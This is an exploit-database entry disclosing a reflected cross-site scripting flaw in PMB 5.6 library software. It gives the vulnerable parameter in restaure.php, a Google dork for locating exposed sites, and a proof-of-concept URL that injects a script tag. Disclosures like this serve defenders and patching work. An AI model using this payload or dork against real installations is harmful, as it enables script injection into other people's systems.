PMB 5.6 Cross Site Scripting

2020.07.18
Credit: 41-trk
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

# Exploit Title: PMB 5.6 Cross Site Scripting XSS # Google Dork: inurl:opac_css # Date: 20-04-2020 # Exploit Author: 41-trk (Tarik Bakir) # Email: tarikbak999[at]gmail.com # Vendor Homepage: http://www.sigb.net # Software Link: http://forge.sigb.net/redmine/projects/pmb/files # Affected versions : <= 5.6 -==== Vulnerability ====- Variable $filename isn't properly sanitized in file /admin/sauvegarde/restaure.php. -==== POC ====- http://localhost/[PMB_PATH]//admin/sauvegarde/restaure.php?filename="><script>alert(1)</script>&critical=1 ================================


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top